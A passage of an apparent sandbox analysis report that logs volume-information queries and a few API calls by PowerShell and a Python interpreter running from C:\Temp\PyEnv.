Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\get-pip.py VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\_socket.pyd VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\select.pyd VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\_queue.pyd VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\_decimal.pyd VolumeInformation
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation Jump to behavior
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv VolumeInformation
Source: C:\Temp\PyEnv\python.exe Queries volume information: C:\Temp\PyEnv\_ctypes.pyd VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFF7F6904E5 CreateNamedPipeW, 20_2_00007FFF7F6904E5
Source: C:\Temp\PyEnv\python.exe Code function: 24_0_00007FF70C491680 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 24_0_00007FF70C491680
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068A45E4 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 26_2_00007FF8068A45E4
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068A55F8 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 26_2_00007FF8068A55F8